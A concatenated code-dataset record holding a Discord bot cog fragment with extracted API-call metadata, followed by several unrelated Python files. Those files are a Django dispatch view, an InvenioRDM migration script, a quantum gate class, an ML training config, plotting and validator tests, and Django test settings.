if not user_allowed(message):
return
if (message.clean_content == "CEASE ALL MOTOR FUNCTIONS"):
await self.bot.add_reaction(message, u"\U0001F480")
return await self.bot.send_message(channel, "As you wish.")
await self.get_emojis_from_message(message)
if ("poop".lower() in message.content.lower().split()):
await self.bot.add_reaction(message, u"\U0001F4A9")
if message.server == celserver:
if ("shit".lower() in message.content.lower().split()):
await self.bot.add_reaction(message, u"\U0001F4A9")
modchan = discord.utils.find(lambda c: "mods" in c.name, celserver.channels)
musicchan = discord.utils.find(lambda c: "requests" in c.name, celserver.channels)
newschan = discord.utils.find(lambda c: "announcements" in c.name, celserver.channels)
genchan = discord.utils.find(lambda c: "general" in c.name, celserver.channels)
devchan = discord.utils.find(lambda c: "bot-dev" in c.name, celserver.channels)
#COPY MESSAGES FROM #ANNOUNCEMENTS custom code:
if (channel == newschan):
return await self.bot.send_message(genchan, "New Announcement: " + message.content)
#AUTO-MODERATE words custom code:
if ("amber".lower() in message.content.lower().split()):
await self.bot.delete_message(message)
if message.channel != musicchan:
await self.bot.send_message(modchan, "The following message by " + message.author.mention + " in the " + message.channel.mention + " channel was deleted for containing the \"*A word*\" in it:\n\n" + message.content)
# await self.bot.send_message(message.author, "You have had a message automatically deleted in the **" + message.server.name + "** server. \nIf you need more info please contact a moderator or admin")
return
@commands.command(pass_context=True)
async def emoji(self, ctx):
"""Lists all emoji's on this server"""
message = ctx.message
channel = message.channel
allemo = ''
emolist = message.server.emojis
emolist.sort(key=operator.attrgetter('name'))
for e in message.server.emojis:
allemo = allemo + '' + str(e) + '\t`:' + e.name + ':`\n'
await self.bot.send_message(channel, "\nEmotes\nAll **" + message.server.name + "** Emojis: \n\n" + allemo)
return
@commands.command(pass_context=True)
async def testmessage(self, ctx):
await self.bot.say(ctx.message.clean_content.upper())
botmem = discord.utils.find(lambda m: m.name == self.bot.user.name, ctx.message.channel.server.members)
botnick = self.bot.user.display_name
if botmem.nick:
botnick = botmem.nick
await self.bot.say(botnick)
await self.bot.say(ctx.message.clean_content.replace(botnick,""))
@commands.command(no_pm=True, pass_context=True)
@checks.admin_or_permissions(manage_roles=True)
async def saychan(self, ctx, sendchan=None, sendmsg=None):
"""Sends text to a specified channel,
saychan <channel> <message>"""
author = ctx.message.author
channel = ctx.message.channel
server = ctx.message.server
if message is None:
return
if sendmsg is None:
return
if sendchan is None:
return
return await self.bot.send_message(sendchan, sendmsg)
@commands.command(no_pm=True, pass_context=True)
@checks.admin_or_permissions(manage_roles=True)
async def rolebulk(self, ctx, method, rolename, message=None):
"""Adds a role to multiple users,
rolebulk <add/remove> <"rollname"> <@mention1, @mention2, ...>
Role name must be in quotes if there are spaces."""
author = ctx.message.author
channel = ctx.message.channel
server = ctx.message.server
if message is None:
return
if method.lower() not in {"add", "remove"}:
return await self.bot.say('You must specify either "add" or "remove"')
if (method.lower() == "add"):
addbool = True
else:
addbool = False
role = self._role_from_string(server, rolename)
#try:
# self.bot.say("Role {} found from rolename {}".format(
# role.name, rolename))
#except:
# log.debug("Role not found for rolename {}".format(rolename))
if role is None:
await self.bot.say('That role cannot be found.')
return
allnames = ctx.message.mentions
if len(allnames) < 1:
return await self.bot.say('Please mention users; no user mentions were found in the command')
if not channel.permissions_for(server.me).manage_roles:
await self.bot.say('I don\'t have manage_roles.')
return
for mem in allnames:
if addbool:
await self.bot.add_roles(mem, role)
else:
await self.bot.remove_roles(user, role)
return await self.bot.say('Complete')
@commands.command(no_pm=True, pass_context=True)
@checks.admin_or_permissions(manage_roles=True)
async def rolemerge(self, ctx, rolename, rolename2):
"""Adds a role to multiple users,
rolebulk <add/remove> <"rollname"> <@mention1, @mention2, ...>
Role name must be in quotes if there are spaces."""
message = ctx.message
author = ctx.message.author
channel = ctx.message.channel
server = ctx.message.server
if message is None:
return
role = self._role_from_string(server, rolename)
role2 = self._role_from_string(server, rolename2)
#try:
# self.bot.say("Role {} found from rolename {}".format(
# role.name, rolename))
#except:
# log.debug("Role not found for rolename {}".format(rolename))
if role is None:
await self.bot.say('That role cannot be found.')
return
if role2 is None:
await self.bot.say('That role cannot be found.')
return
if not channel.permissions_for(server.me).manage_roles:
await self.bot.say('I don\'t have manage_roles.')
return
allnames = server.members
for mem in allnames:
memrole = discord.utils.find(role2, mem.roles)
if memrole:
add_roles(mem, role)
remove_roles(role2, mem)
return await self.bot.say('Complete')
def imgprocess(self, listed):
images = [Image.open(i) for i in listed]
widths, heights = zip(*(i.size for i in images))
total_width = sum(widths)
max_height = max(heights)
new_im = Image.new("RGBA", (total_width, max_height))
x_offset = 0
for im in images:
new_im.paste(im, (x_offset, 0))
x_offset += im.size[0]
cat = "test.png"
new_im.save("data/ordcustom/" + cat)
return cat
def check_folders():
paths = ("data/ordcustom", "data/ordcustom/emojis")
for path in paths:
if not os.path.exists(path):
print("Creating {} folder...".format(path))
os.makedirs(path)
def setup(bot):
check_folders()
bot.add_cog(Ordcustom(bot))
|
[
"PIL.Image.new",
"re.split",
"discord.ext.commands.command",
"discord.utils.find",
"__main__.user_allowed",
"os.makedirs",
"os.path.exists",
"PIL.Image.open",
"cogs.utils.checks.admin_or_permissions",
"os.path.isfile",
"operator.attrgetter",
"re.findall",
"aiohttp.get",
"os.path.join",
"re.compile"
] |
[((1258, 1274), 're.split', 're.split', (['""" """', 's'], {}), "(' ', s)\n", (1266, 1274), False, 'import re\n'), ((8317, 8352), 'discord.ext.commands.command', 'commands.command', ([], {'pass_context': '(True)'}), '(pass_context=True)\n', (8333, 8352), False, 'from discord.ext import commands\n'), ((8866, 8901), 'discord.ext.commands.command', 'commands.command', ([], {'pass_context': '(True)'}), '(pass_context=True)\n', (8882, 8901), False, 'from discord.ext import commands\n'), ((9376, 9423), 'discord.ext.commands.command', 'commands.command', ([], {'no_pm': '(True)', 'pass_context': '(True)'}), '(no_pm=True, pass_context=True)\n', (9392, 9423), False, 'from discord.ext import commands\n'), ((9429, 9475), 'cogs.utils.checks.admin_or_permissions', 'checks.admin_or_permissions', ([], {'manage_roles': '(True)'}), '(manage_roles=True)\n', (9456, 9475), False, 'from cogs.utils import checks\n'), ((10015, 10062), 'discord.ext.commands.command', 'commands.command', ([], {'no_pm': '(True)', 'pass_context': '(True)'}), '(no_pm=True, pass_context=True)\n', (10031, 10062), False, 'from discord.ext import commands\n'), ((10068, 10114), 'cogs.utils.checks.admin_or_permissions', 'checks.admin_or_permissions', ([], {'manage_roles': '(True)'}), '(manage_roles=True)\n', (10095, 10114), False, 'from cogs.utils import checks\n'), ((11764, 11811), 'discord.ext.commands.command', 'commands.command', ([], {'no_pm': '(True)', 'pass_context': '(True)'}), '(no_pm=True, pass_context=True)\n', (11780, 11811), False, 'from discord.ext import commands\n'), ((11817, 11863), 'cogs.utils.checks.admin_or_permissions', 'checks.admin_or_permissions', ([], {'manage_roles': '(True)'}), '(manage_roles=True)\n', (11844, 11863), False, 'from cogs.utils import checks\n'), ((2652, 2698), 're.compile', 're.compile', (['"""<:([^:]*):(\\\\d*)>"""', 're.IGNORECASE'], {}), "('<:([^:]*):(\\\\d*)>', re.IGNORECASE)\n", (2662, 2698), False, 'import re\n'), ((4383, 4429), 'os.path.join', 'os.path.join', (['"""data"""', '"""trigger"""', '"""files"""', 'path'], {}), "('data', 'trigger', 'files', path)\n", (4395, 4429), False, 'import os\n'), ((4461, 4481), 'os.path.isfile', 'os.path.isfile', (['path'], {}), '(path)\n', (4475, 4481), False, 'import os\n'), ((9036, 9135), 'discord.utils.find', 'discord.utils.find', (['(lambda m: m.name == self.bot.user.name)', 'ctx.message.channel.server.members'], {}), '(lambda m: m.name == self.bot.user.name, ctx.message.\n channel.server.members)\n', (9054, 9135), False, 'import discord\n'), ((13516, 13560), 'PIL.Image.new', 'Image.new', (['"""RGBA"""', '(total_width, max_height)'], {}), "('RGBA', (total_width, max_height))\n", (13525, 13560), False, 'from PIL import Image\n'), ((6233, 6254), '__main__.user_allowed', 'user_allowed', (['message'], {}), '(message)\n', (6245, 6254), False, 'from __main__ import send_cmd_help, user_allowed\n'), ((6936, 7002), 'discord.utils.find', 'discord.utils.find', (["(lambda c: 'mods' in c.name)", 'celserver.channels'], {}), "(lambda c: 'mods' in c.name, celserver.channels)\n", (6954, 7002), False, 'import discord\n'), ((7027, 7097), 'discord.utils.find', 'discord.utils.find', (["(lambda c: 'requests' in c.name)", 'celserver.channels'], {}), "(lambda c: 'requests' in c.name, celserver.channels)\n", (7045, 7097), False, 'import discord\n'), ((7121, 7196), 'discord.utils.find', 'discord.utils.find', (["(lambda c: 'announcements' in c.name)", 'celserver.channels'], {}), "(lambda c: 'announcements' in c.name, celserver.channels)\n", (7139, 7196), False, 'import discord\n'), ((7219, 7288), 'discord.utils.find', 'discord.utils.find', (["(lambda c: 'general' in c.name)", 'celserver.channels'], {}), "(lambda c: 'general' in c.name, celserver.channels)\n", (7237, 7288), False, 'import discord\n'), ((7311, 7380), 'discord.utils.find', 'discord.utils.find', (["(lambda c: 'bot-dev' in c.name)", 'celserver.channels'], {}), "(lambda c: 'bot-dev' in c.name, celserver.channels)\n", (7329, 7380), False, 'import discord\n'), ((13082, 13118), 'discord.utils.find', 'discord.utils.find', (['role2', 'mem.roles'], {}), '(role2, mem.roles)\n', (13100, 13118), False, 'import discord\n'), ((13343, 13356), 'PIL.Image.open', 'Image.open', (['i'], {}), '(i)\n', (13353, 13356), False, 'from PIL import Image\n'), ((13893, 13913), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (13907, 13913), False, 'import os\n'), ((13983, 14000), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (13994, 14000), False, 'import os\n'), ((8581, 8608), 'operator.attrgetter', 'operator.attrgetter', (['"""name"""'], {}), "('name')\n", (8600, 8608), False, 'import operator\n'), ((955, 976), 're.findall', 're.findall', (['pat', 'trim'], {}), '(pat, trim)\n', (965, 976), False, 'import re\n'), ((3403, 3435), 'aiohttp.get', 'aiohttp.get', (['url'], {'headers': 'option'}), '(url, headers=option)\n', (3414, 3435), False, 'import aiohttp\n'), ((5346, 5373), 'operator.attrgetter', 'operator.attrgetter', (['"""name"""'], {}), "('name')\n", (5365, 5373), False, 'import operator\n'), ((5605, 5632), 'operator.attrgetter', 'operator.attrgetter', (['"""name"""'], {}), "('name')\n", (5624, 5632), False, 'import operator\n')]
|
from switchlang import switch
from django.conf import settings
from django.http import Http404
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import View
class PageNotFoundView(View):
"""
Fallback view for the dispatch helper below.
All this view does is return a 404, and its sole purpose is decluttering the
dispatch helper view defined below.
By using it as the default value for parameters to dispatch, dispatch doesn't have
to explicitly account for omitted classes, and can just call the as_view method.
"""
def dispatch(self, request, *args, **kwargs):
raise Http404()
@csrf_exempt
def dispatch(
request,
main_class=PageNotFoundView,
cms_class=PageNotFoundView,
short_class=PageNotFoundView,
**kwargs,
):
"""
Delegate to the correct class based on the current site.
This helper view allows the user to delegate the request to the correct class based
on the current site. This allows for different apps with their own needs to "share"
URLs when appropriate.
Each of the "_class" params corresponds to a view class for the desired app.
"""
with switch(request.site.domain) as app:
app.case(settings.FULL_DOMAINS, lambda: main_class)
app.case(settings.SHORT_DOMAINS, lambda: short_class)
app.default(lambda: cms_class)
return app.result.as_view()(request, **kwargs)
|
[
"switchlang.switch",
"django.http.Http404"
] |
[((644, 653), 'django.http.Http404', 'Http404', ([], {}), '()\n', (651, 653), False, 'from django.http import Http404\n'), ((1184, 1211), 'switchlang.switch', 'switch', (['request.site.domain'], {}), '(request.site.domain)\n', (1190, 1211), False, 'from switchlang import switch\n')]
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2022 CERN.
#
# Invenio-App-RDM is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""Record migration script from InvenioRDM 8.0 to 9.0.
Disclaimer: This script is intended to be executed *only once*, namely when
upgrading from InvenioRDM 8.0 to 9.0!
If this script is executed at any other time, probably the best case scenario
is that nothing happens!
"""
from click import echo, secho
from invenio_db import db
from invenio_rdm_records.records.api import RDMRecord
def execute_upgrade():
"""Execute the upgrade from InvenioRDM 8.0 to 9.0.
Please read the disclaimer on this module before thinking about executing
this function!
"""
def update_funding_field(record):
try:
echo(f"Updating record: {record['id']}... ", nl=False)
for funding in record.metadata.get("funding", []):
award = funding.get("award", {})
funder = funding.get("funder", {})
if award.get("identifier") and award.get("scheme"):
award_identifier = award.pop("identifier")
award_scheme = award.pop("scheme")
funding["award"]["identifiers"] = [
{"identifier": award_identifier, "scheme": award_scheme}
]
if funder.get("identifier") and funder.get("scheme"):
funder.pop("identifier")
funder.pop("scheme")
if award.get("title", ""):
award_title = award.pop("title")
funding["award"]["title"] = {"en": award_title}
if funder.get("title", ""):
funder.pop("title")
secho("OK", fg="green")
return record
except Exception as e:
secho("Error {}".format(repr(e)), fg="red")
return None
errors = []
records = RDMRecord.model_cls.query.all()
for record in records:
r = RDMRecord(record.data, model=record)
r["$schema"] = "local://records/record-v5.0.0.json"
res = update_funding_field(r)
if res is None:
errors.append("Record {} failed to update funding".format(r.id))
else:
r = res
r.commit()
success = not errors
if success:
echo(f"Commiting to DB", nl=True)
db.session.commit()
secho(
"Data migration completed, please rebuild the search indices now.",
fg="green",
)
else:
echo(f"Rollback", nl=True)
db.session.rollback()
secho(
"Upgrade aborted due to the following errors:",
fg="red",
err=True,
)
for error in errors:
secho(error, fg="red", err=True)
msg = (
"The changes have been rolled back. "
"Please fix the above listed errors and try the upgrade again",
)
secho(msg, fg="yellow", err=True)
# if the script is executed on its own, perform the upgrade
if __name__ == "__main__":
execute_upgrade()
|
[
"invenio_rdm_records.records.api.RDMRecord.model_cls.query.all",
"click.echo",
"invenio_db.db.session.commit",
"invenio_db.db.session.rollback",
"click.secho",
"invenio_rdm_records.records.api.RDMRecord"
] |
[((2016, 2047), 'invenio_rdm_records.records.api.RDMRecord.model_cls.query.all', 'RDMRecord.model_cls.query.all', ([], {}), '()\n', (2045, 2047), False, 'from invenio_rdm_records.records.api import RDMRecord\n'), ((2087, 2123), 'invenio_rdm_records.records.api.RDMRecord', 'RDMRecord', (['record.data'], {'model': 'record'}), '(record.data, model=record)\n', (2096, 2123), False, 'from invenio_rdm_records.records.api import RDMRecord\n'), ((2431, 2464), 'click.echo', 'echo', (['f"""Commiting to DB"""'], {'nl': '(True)'}), "(f'Commiting to DB', nl=True)\n", (2435, 2464), False, 'from click import echo, secho\n'), ((2473, 2492), 'invenio_db.db.session.commit', 'db.session.commit', ([], {}), '()\n', (2490, 2492), False, 'from invenio_db import db\n'), ((2501, 2590), 'click.secho', 'secho', (['"""Data migration completed, please rebuild the search indices now."""'], {'fg': '"""green"""'}), "('Data migration completed, please rebuild the search indices now.',\n fg='green')\n", (2506, 2590), False, 'from click import echo, secho\n'), ((2641, 2667), 'click.echo', 'echo', (['f"""Rollback"""'], {'nl': '(True)'}), "(f'Rollback', nl=True)\n", (2645, 2667), False, 'from click import echo, secho\n'), ((2676, 2697), 'invenio_db.db.session.rollback', 'db.session.rollback', ([], {}), '()\n', (2695, 2697), False, 'from invenio_db import db\n'), ((2706, 2779), 'click.secho', 'secho', (['"""Upgrade aborted due to the following errors:"""'], {'fg': '"""red"""', 'err': '(True)'}), "('Upgrade aborted due to the following errors:', fg='red', err=True)\n", (2711, 2779), False, 'from click import echo, secho\n'), ((3063, 3096), 'click.secho', 'secho', (['msg'], {'fg': '"""yellow"""', 'err': '(True)'}), "(msg, fg='yellow', err=True)\n", (3068, 3096), False, 'from click import echo, secho\n'), ((844, 898), 'click.echo', 'echo', (['f"""Updating record: {record[\'id\']}... """'], {'nl': '(False)'}), '(f"Updating record: {record[\'id\']}... ", nl=False)\n', (848, 898), False, 'from click import echo, secho\n'), ((1823, 1846), 'click.secho', 'secho', (['"""OK"""'], {'fg': '"""green"""'}), "('OK', fg='green')\n", (1828, 1846), False, 'from click import echo, secho\n'), ((2869, 2901), 'click.secho', 'secho', (['error'], {'fg': '"""red"""', 'err': '(True)'}), "(error, fg='red', err=True)\n", (2874, 2901), False, 'from click import echo, secho\n')]
|
"""This module implements the RYGate."""
from __future__ import annotations
import numpy as np
from bqskit.ir.gates.qubitgate import QubitGate
from bqskit.qis.unitary.differentiable import DifferentiableUnitary
from bqskit.qis.unitary.optimizable import LocallyOptimizableUnitary
from bqskit.qis.unitary.unitary import RealVector
from bqskit.qis.unitary.unitarymatrix import UnitaryMatrix
from bqskit.utils.cachedclass import CachedClass
class RYGate(
QubitGate,
DifferentiableUnitary,
LocallyOptimizableUnitary,
CachedClass,
):
"""
A gate representing an arbitrary rotation around the Y axis.
It is given by the following parameterized unitary:
.. math::
\\begin{pmatrix}
\\cos{\\frac{\\theta}{2}} & -\\sin{\\frac{\\theta}{2}} \\\\
\\sin{\\frac{\\theta}{2}} & \\cos{\\frac{\\theta}{2}} \\\\
\\end{pmatrix}
"""
_num_qudits = 1
_num_params = 1
_qasm_name = 'ry'
def get_unitary(self, params: RealVector = []) -> UnitaryMatrix:
"""Return the unitary for this gate, see :class:`Unitary` for more."""
self.check_parameters(params)
cos = np.cos(params[0] / 2)
sin = np.sin(params[0] / 2)
return UnitaryMatrix(
[
[cos, -sin],
[sin, cos],
],
)
def get_grad(self, params: RealVector = []) -> np.ndarray:
"""
Return the gradient for this gate.
See :class:`DifferentiableUnitary` for more info.
"""
self.check_parameters(params)
dcos = -np.sin(params[0] / 2) / 2
dsin = np.cos(params[0] / 2) / 2
return np.array(
[
[
[dcos, -dsin],
[dsin, dcos],
],
], dtype=np.complex128,
)
def optimize(self, env_matrix: np.ndarray) -> list[float]:
"""
Return the optimal parameters with respect to an environment matrix.
See :class:`LocallyOptimizableUnitary` for more info.
"""
self.check_env_matrix(env_matrix)
a = np.real(env_matrix[0, 0] + env_matrix[1, 1])
b = np.real(env_matrix[1, 0] - env_matrix[0, 1])
theta = 2 * np.arccos(a / np.sqrt(a ** 2 + b ** 2))
theta *= -1 if b > 0 else 1
return [theta]
|
[
"bqskit.qis.unitary.unitarymatrix.UnitaryMatrix",
"numpy.sin",
"numpy.array",
"numpy.real",
"numpy.cos",
"numpy.sqrt"
] |
[((1151, 1172), 'numpy.cos', 'np.cos', (['(params[0] / 2)'], {}), '(params[0] / 2)\n', (1157, 1172), True, 'import numpy as np\n'), ((1187, 1208), 'numpy.sin', 'np.sin', (['(params[0] / 2)'], {}), '(params[0] / 2)\n', (1193, 1208), True, 'import numpy as np\n'), ((1225, 1265), 'bqskit.qis.unitary.unitarymatrix.UnitaryMatrix', 'UnitaryMatrix', (['[[cos, -sin], [sin, cos]]'], {}), '([[cos, -sin], [sin, cos]])\n', (1238, 1265), False, 'from bqskit.qis.unitary.unitarymatrix import UnitaryMatrix\n'), ((1664, 1726), 'numpy.array', 'np.array', (['[[[dcos, -dsin], [dsin, dcos]]]'], {'dtype': 'np.complex128'}), '([[[dcos, -dsin], [dsin, dcos]]], dtype=np.complex128)\n', (1672, 1726), True, 'import numpy as np\n'), ((2122, 2166), 'numpy.real', 'np.real', (['(env_matrix[0, 0] + env_matrix[1, 1])'], {}), '(env_matrix[0, 0] + env_matrix[1, 1])\n', (2129, 2166), True, 'import numpy as np\n'), ((2179, 2223), 'numpy.real', 'np.real', (['(env_matrix[1, 0] - env_matrix[0, 1])'], {}), '(env_matrix[1, 0] - env_matrix[0, 1])\n', (2186, 2223), True, 'import numpy as np\n'), ((1622, 1643), 'numpy.cos', 'np.cos', (['(params[0] / 2)'], {}), '(params[0] / 2)\n', (1628, 1643), True, 'import numpy as np\n'), ((1581, 1602), 'numpy.sin', 'np.sin', (['(params[0] / 2)'], {}), '(params[0] / 2)\n', (1587, 1602), True, 'import numpy as np\n'), ((2258, 2282), 'numpy.sqrt', 'np.sqrt', (['(a ** 2 + b ** 2)'], {}), '(a ** 2 + b ** 2)\n', (2265, 2282), True, 'import numpy as np\n')]
|
import copy
import os.path as osp
_root_ = '../../../..'
_base_ = [osp.join(_root_, 'configs/base.py'),'../model_samplers/ar50to101v2.py']
manipulate_arch = False
_data_root_ = '/data1/Data/imagenet'
# model settings
model = dict(
type='DynamicMOCO',
queue_len=65536,
feat_dim=128,
momentum=0.999,
backbone=dict(
type='DynamicResNet',
in_channels=3,
stem_width=64,
body_depth=[4, 6, 29, 4],
body_width=[80, 160, 320, 640],
num_stages=4,
out_indices=[3],
conv_cfg=dict(type='DynConv2d'),
norm_cfg=dict(type='DynBN', requires_grad=True),
style='pytorch',
),
neck=dict(
type='DynamicNonLinearNeckV1',
in_channels=2560,
hid_channels=2048,
out_channels=128,
with_avg_pool=True),
head=dict(type='ContrastiveHead', temperature=0.2))
# dataset settings
data_source_cfg = dict(
type='ImageNet',
return_label=False,
)
# ImageNet
data_train_list = osp.join(_data_root_, 'train_10percent.txt')
data_train_root = osp.join(_data_root_, 'ILSVRC2012_img_train')
dataset_type = 'ContrastiveDataset'
img_norm_cfg = dict(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
# for other dataset, please keep the same test pipeline except for the crop, too large crop will case memory out
train_pipeline = [
dict(type='Resize', size=256),
dict(type='CenterCrop', size=224),
]
# prefetch
prefetch = False
if not prefetch:
train_pipeline.extend([dict(type='ToTensor'), dict(type='Normalize', **img_norm_cfg)])
data = dict(
imgs_per_gpu=16, # total 32*8=256
workers_per_gpu=2,
drop_last=True,
train=dict(
type=dataset_type,
data_source=dict(
list_file=data_train_list, root=data_train_root,
**data_source_cfg),
pipeline=train_pipeline,
prefetch=prefetch,
))
optimizer = dict(type='SGD', lr=0.12, weight_decay=0.0001, momentum=0.9)
lr_config = dict(policy='CosineAnnealing', min_lr=0.)
checkpoint_config = dict(interval=20)
# runtime settings
total_epochs = 1
work_dir = "/data2/OpenSelfSup-gaia/workdirs/moco"
model_space_path = 'hubs/flops.json'
model_sampling_rules = dict(
type='sequential',
rules=[
dict(
type='parallel',
rules=[
dict(func_str='lambda x: x[\'overhead.flops\'] >=5000000000 and x[\'overhead.flops\']<6000000000'),
]
),
dict(func_str='lambda x: x[\'data.input_shape\'] == 224'),
# sample
dict(
type='sample',
operation='random',
value=100,
mode='number',
),
# merge all groups if more than one
dict(type='merge'),
]
)
|
[
"os.path.join"
] |
[((1004, 1048), 'os.path.join', 'osp.join', (['_data_root_', '"""train_10percent.txt"""'], {}), "(_data_root_, 'train_10percent.txt')\n", (1012, 1048), True, 'import os.path as osp\n'), ((1067, 1112), 'os.path.join', 'osp.join', (['_data_root_', '"""ILSVRC2012_img_train"""'], {}), "(_data_root_, 'ILSVRC2012_img_train')\n", (1075, 1112), True, 'import os.path as osp\n'), ((67, 102), 'os.path.join', 'osp.join', (['_root_', '"""configs/base.py"""'], {}), "(_root_, 'configs/base.py')\n", (75, 102), True, 'import os.path as osp\n')]
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import matplotlib.pyplot as plt
import seaborn
from bezier import _plot_helpers
from tests.functional import test_triangle_locate
from tests.functional import utils
def make_plot(triangle_index, point_index, save_plot):
triangle = test_triangle_locate.TRIANGLES[triangle_index]
point = test_triangle_locate.POINTS[:, [point_index]]
name = f"test_triangle{triangle_index}_and_point{point_index}"
ax = triangle.plot(64)
ax.plot(
point[0, :], point[1, :], color="black", marker="o", linestyle="None"
)
ax.axis("scaled")
_plot_helpers.add_plot_boundary(ax)
if save_plot:
utils.save_fig(name)
else:
plt.title(name.replace("_", r"\_"))
plt.show()
plt.close(ax.figure)
def main():
parser = utils.get_parser()
args = parser.parse_args()
for case in test_triangle_locate.CASES:
triangle_index, point_index, _, _ = case
make_plot(triangle_index, point_index, args.save_plot)
if __name__ == "__main__":
seaborn.set() # Required in `seaborn >= 0.8`
main()
|
[
"bezier._plot_helpers.add_plot_boundary",
"tests.functional.utils.get_parser",
"matplotlib.pyplot.show",
"matplotlib.pyplot.close",
"tests.functional.utils.save_fig",
"seaborn.set"
] |
[((1107, 1142), 'bezier._plot_helpers.add_plot_boundary', '_plot_helpers.add_plot_boundary', (['ax'], {}), '(ax)\n', (1138, 1142), False, 'from bezier import _plot_helpers\n'), ((1267, 1287), 'matplotlib.pyplot.close', 'plt.close', (['ax.figure'], {}), '(ax.figure)\n', (1276, 1287), True, 'import matplotlib.pyplot as plt\n'), ((1315, 1333), 'tests.functional.utils.get_parser', 'utils.get_parser', ([], {}), '()\n', (1331, 1333), False, 'from tests.functional import utils\n'), ((1554, 1567), 'seaborn.set', 'seaborn.set', ([], {}), '()\n', (1565, 1567), False, 'import seaborn\n'), ((1169, 1189), 'tests.functional.utils.save_fig', 'utils.save_fig', (['name'], {}), '(name)\n', (1183, 1189), False, 'from tests.functional import utils\n'), ((1252, 1262), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1260, 1262), True, 'import matplotlib.pyplot as plt\n')]
|
import pytest
from goodboy.i18n import set_process_locale
from goodboy.types.numeric import Int
from goodboy.validator import Validator
schema = Int()
def test_validate():
assert Validator(schema).validate(42).is_valid
assert not Validator(schema).validate("42").is_valid
def test_validate_with_typecast():
assert Validator(schema).validate(42, typecast=True).is_valid
assert Validator(schema).validate("42", typecast=True).is_valid
@pytest.mark.parametrize(
"languages,message",
[
(["ru"], "не может быть null"),
(["en"], "cannot be null"),
],
)
def test_messages_translation(languages, message):
result = Validator(schema).validate(None)
assert result.format_errors("json", languages=languages)[0]["message"] == message
@pytest.mark.parametrize(
"languages,message",
[
(["ru"], "не может быть null"),
(["en"], "cannot be null"),
],
)
def test_messages_translation_with_default_locale(languages, message):
result = Validator(schema).validate(None)
set_process_locale(languages)
assert result.format_errors("json")[0]["message"] == message
|
[
"goodboy.types.numeric.Int",
"pytest.mark.parametrize",
"goodboy.i18n.set_process_locale",
"goodboy.validator.Validator"
] |
[((147, 152), 'goodboy.types.numeric.Int', 'Int', ([], {}), '()\n', (150, 152), False, 'from goodboy.types.numeric import Int\n'), ((458, 569), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""languages,message"""', "[(['ru'], 'не может быть null'), (['en'], 'cannot be null')]"], {}), "('languages,message', [(['ru'], 'не может быть null'\n ), (['en'], 'cannot be null')])\n", (481, 569), False, 'import pytest\n'), ((785, 896), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""languages,message"""', "[(['ru'], 'не может быть null'), (['en'], 'cannot be null')]"], {}), "('languages,message', [(['ru'], 'не может быть null'\n ), (['en'], 'cannot be null')])\n", (808, 896), False, 'import pytest\n'), ((1047, 1076), 'goodboy.i18n.set_process_locale', 'set_process_locale', (['languages'], {}), '(languages)\n', (1065, 1076), False, 'from goodboy.i18n import set_process_locale\n'), ((663, 680), 'goodboy.validator.Validator', 'Validator', (['schema'], {}), '(schema)\n', (672, 680), False, 'from goodboy.validator import Validator\n'), ((1010, 1027), 'goodboy.validator.Validator', 'Validator', (['schema'], {}), '(schema)\n', (1019, 1027), False, 'from goodboy.validator import Validator\n'), ((187, 204), 'goodboy.validator.Validator', 'Validator', (['schema'], {}), '(schema)\n', (196, 204), False, 'from goodboy.validator import Validator\n'), ((332, 349), 'goodboy.validator.Validator', 'Validator', (['schema'], {}), '(schema)\n', (341, 349), False, 'from goodboy.validator import Validator\n'), ((398, 415), 'goodboy.validator.Validator', 'Validator', (['schema'], {}), '(schema)\n', (407, 415), False, 'from goodboy.validator import Validator\n'), ((242, 259), 'goodboy.validator.Validator', 'Validator', (['schema'], {}), '(schema)\n', (251, 259), False, 'from goodboy.validator import Validator\n')]
|
"""Settings that need to be set in order to run the tests."""
import logging
import os
from oscar import get_core_apps
from oscar.defaults import * # NOQA
ASIAPAY_PAYDOLLAR_URL = "ASIAPAY_URL"
ASIAPAY_MERCHANT_ID = "12345"
logging.getLogger('factory').setLevel(logging.WARN)
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',
},
}
DEBUG = True
FILER_DEBUG = True
SITE_ID = 1
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": ":memory:",
}
}
USE_I18N = True
LANGUAGE_CODE = 'en'
LANGUAGES = (
('en', 'English'),
('de', 'German'),
)
ROOT_URLCONF = 'asiapay.tests.urls'
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
STATIC_ROOT = os.path.join(os.path.dirname(__file__), '../../static/')
MEDIA_ROOT = os.path.join(os.path.dirname(__file__), '../../media/')
STATICFILES_DIRS = (
os.path.join(os.path.dirname(__file__), 'test_static'),
)
TEMPLATES = [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(os.path.dirname(__file__), '../templates'),],
'OPTIONS': {
'debug': DEBUG,
'loaders': (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
),
'context_processors': (
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.request',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.contrib.messages.context_processors.messages',
'django_libs.context_processors.analytics',
'sekizai.context_processors.sekizai',
'cms.context_processors.cms_settings',
'var_project_name.context_processors.project_settings',
)
}
}]
COVERAGE_REPORT_HTML_OUTPUT_DIR = os.path.join(
os.path.dirname(__file__), 'coverage')
COVERAGE_MODULE_EXCLUDES = [
'tests$', 'settings$', 'urls$', 'locale$',
'migrations', 'fixtures', 'admin$', 'django_extensions',
]
EXTERNAL_APPS = [
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.auth',
